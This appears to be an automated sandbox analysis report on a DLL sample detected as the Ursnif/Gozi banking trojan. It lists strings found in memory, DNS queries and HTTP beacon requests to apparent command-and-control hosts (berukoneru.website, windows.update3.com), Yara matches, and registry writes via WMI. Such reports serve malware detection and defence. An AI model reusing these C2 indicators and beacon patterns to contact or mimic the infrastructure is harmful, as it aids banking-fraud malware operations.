          Source: loaddll32.exe, 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
          Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.518452737.000000000333A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520647340.0000000003333000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.655671376.0000000003335000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.471079940.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.674023978.0000000003336000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.654359694.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.655489490.000000000332C000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527705942.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.654149765.00000164EB229000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.667097557.00000164EB22A000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: powershell.exe, 00000018.00000003.653604031.00000164EB3D9000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.555671260.00000164EB3D4000.00000004.00000001.sdmp | String found in binary or memory: http://crl.microsoftq
          Source: loaddll32.exe, 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
          Source: powershell.exe, 00000018.00000002.705821003.00000164E2DF3000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 0000001A.00000002.657039685.000002DABC760000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: loaddll32.exe, 00000000.00000003.472208174.0000000000FF4000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472191920.0000000000FEB000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472229200.0000000000FF5000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.mic
          Source: powershell.exe, 00000018.00000002.669107613.00000164D2D91000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.651339407.000002DABC551000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 0000001A.00000002.657039685.000002DABC760000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: rundll32.exe, 00000005.00000003.470823286.0000000002F94000.00000004.00000001.sdmp | String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
          Source: loaddll32.exe, 00000000.00000003.472208174.0000000000FF4000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472191920.0000000000FEB000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472229200.0000000000FF5000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.471060406.000000000338D000.00000004.00000001.sdmp | String found in binary or memory: https://aka.ms/MicrosoftEdgeDownload&quot;
          Source: regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/
          Source: regsvr32.exe, 00000003.00000003.520125804.000000000330C000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527683209.0000000003310000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf
          Source: regsvr32.exe, 00000003.00000003.517457436.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uq
          Source: powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
          Source: powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 0000001A.00000002.657039685.000002DABC760000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
          Source: regsvr32.exe, 00000003.00000003.471060406.000000000338D000.00000004.00000001.sdmp | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xdax&quot;
          Source: loaddll32.exe, 00000000.00000003.472229200.0000000000FF5000.00000004.00000001.sdmp | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xvsU?ver=e636&quot;
          Source: powershell.exe, 00000018.00000002.705821003.00000164E2DF3000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
          Source: rundll32.exe, 00000005.00000003.470823286.0000000002F94000.00000004.00000001.sdmp | String found in binary or memory: https://statics-marketingsites-eus-ms-com.akamaized.net/statics/override.css
          Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.518452737.000000000333A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520647340.0000000003333000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527705942.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmp | String found in binary or memory: https://windows.update3.com/
          Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp | String found in binary or memory: https://windows.update3.com/P
          Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.518452737.000000000333A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520647340.0000000003333000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmp | String found in binary or memory: https://windows.update3.com/i
          Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp | String found in binary or memory: https://windows.update3.com/tire/vuHeqIQ3bqpSw_2Byc/c_2BB_2Fi/KRLpI_2FLMzbCYIdYZV9/wMp8vpBadTBEn6lom
          Source: unknown | DNS traffic detected: queries for: windows.update3.com
          Source: global traffic | HTTP traffic detected: GET /tire/jd_2FYT4kZR8w841QcBB1/tR81NFI9aRqohSRO/X0dydnORWplT5uR/5w00AG_2B_2FJ09dQQ/WUxRePiB4/GTOJFQ8FP8igXEjbgkH9/zEak3366_2FSVu5YatC/6c8yBLY3VgDZriaVuWUlRJ/NfUpYHR7DlV_2/FmC6rrvj/IWZqq_2FXZYrZ6Jfrjl4wOK/cOGNowVtID/CNlyDmEUAcdL6Nggn/Q6FP_2FvO/_2BU9JHdR/p.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
          Source: global traffic | HTTP traffic detected: GET /tire/yIaXbfYof9IP/8B_2BPJ4_2B/hMnTiYTFHmvWMq/Om0JbLkmD_2F5koSu_2FY/nLk_2FKibFUJ9gOk/MZT8jf1B5RdC0UZ/6Z4No8ixNFmBVmH7Bj/uDf3BhOPM/DLBe_2Bd6mkqoP7YTIID/XBuFTJLHbx1D4QjnBWn/TnGiYGHPz2eGN6knS8Er2o/_2B5QVwmx2J_2/BE8gCb3N/ingbPXC9ZN_2BMhH2cvWH8p/CYnerQtz/Ddd.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
          Source: global traffic | HTTP traffic detected: GET /tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uqJTyp4A5eQ/0U2GqSt0iiLbUx/HO3viOhQ8WkG8vbfTOB_2/BnaqEkGKFXXYKGIR/Ctbh99dX8lvtuYg/YlazQ5uDO_2FKEL9Q_/2BJjb_2Fo/n4TKwNU4Z7gGvATNQb4t/rYS_2FADS/RnX9qstM/g.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
          Source: global traffic | HTTP traffic detected: GET /tire/qmvui3Jef80_2BIeM_2BXh/O_2By54KPinsD/_2BFfpah/5k89w5bXqU7DEWhQp1iBEy2/_2BnU_2FsR/sUo3C8aISdxyIYl8W/JynqV_2BmddH/AgiN2_2BUrO/VCPQbezXreMebQ/izeoYIW_2BTEh6B2Zh_2B/L3PgbMDpsuFq53n5/obVS_2BHmsXbkex/IxU7ONkaq6S5id4E4C/VTSP2pp87/7bclEnvP5UuFRz5_2FIN/q_2FKVUn/a3U.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
          Source: global traffic | HTTP traffic detected: GET /tire/pXEvhesP8JJkQtOX4Z5G/OiJKf20ix2ZGR09v_2B/AwevbnlWqTi_2FbmjeIBIJ/B8iREIEDTHJ8C/QPwxSlTX/9Ss6_2FUQqUE8Rtt6tkm28v/8Qb_2FbAb4/RcCK4EpQ3Lh0e_2BV/nW7_2F9KVPTc/RWwFawwnn1T/NBQ509K2MeA0Zg/X_2BL3B2nl1ByESW4otQy/_2FmAs1Ly6/iqZ3GWXa.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
          Source: global traffic | HTTP traffic detected: GET /tire/XmFjtmy1jR6lateNyuPVYzk/zqxAUph9t_/2FhKh_2BKiBZEq6Pk/avtEml_2FYjs/Y8y781fyUpX/C_2FGsjVf_2F1i/tI0L_2Fc4mVHQ5jOtMGU8/MLBmn_2F0B4RgjE1/vjwq5A2_2B3O0OF/2xAZRByvalCt4EW7PP/8v2xGWGrY/70z8u8ipgSqR2XldqMkC/Q_2FRHW9LM53wtTl2y8/wrMCO.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
          Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49812 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49813 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49814 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49815 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49816 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49817 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49819 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49820 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49821 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49822 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49823 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49825 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          Yara detected Ursnif
          Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 7016, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7056, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7084, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: control.exe PID: 5832, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: control.exe PID: 5952, type: MEMORYSTR

          E-Banking Fraud:

          Yara detected Ursnif
          Source: Yara matchFile source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.495487329.000000000395B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.518696418.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.494405815.000000000569B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.518133566.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.517688433.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.654830894.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.517563234.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.647561301.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7016, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7056, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7084, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: control.exe PID: 5832, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: control.exe PID: 5952, type: MEMORYSTR

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Win32.Gozi | Author: CCN-CERT
          Source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Win32.Gozi | Author: CCN-CERT
          Source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Win32.Gozi | Author: CCN-CERT
          Source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Win32.Gozi | Author: CCN-CERT
          Source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Win32.Gozi | Author: CCN-CERT
          Source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Win32.Gozi | Author: CCN-CERT
          Source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Win32.Gozi | Author: CCN-CERT
          Source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Win32.Gozi | Author: CCN-CERT
          Source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Win32.Gozi | Author: CCN-CERT
          Source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Win32.Gozi | Author: CCN-CERT
          Source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Win32.Gozi | Author: CCN-CERT
          Source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Win32.Gozi | Author: CCN-CERT
          Source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Win32.Gozi | Author: CCN-CERT
          Source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Win32.Gozi | Author: CCN-CERT
          Source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Win32.Gozi | Author: CCN-CERT
          Source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Win32.Gozi | Author: CCN-CERT
          Source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Win32.Gozi | Author: CCN-CERT
          Source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Win32.Gozi | Author: CCN-CERT
          Source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Win32.Gozi | Author: CCN-CERT
          Source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Win32.Gozi | Author: CCN-CERT
          Source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Win32.Gozi | Author: CCN-CERT
          PE file has a writeable .text section
          Source: 61b85f75e6a7c.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Writes or reads registry keys via WMI
          Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
          Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
          Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Writes registry values via WMI
          Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: 61b85f75e6a7c.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
          Source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
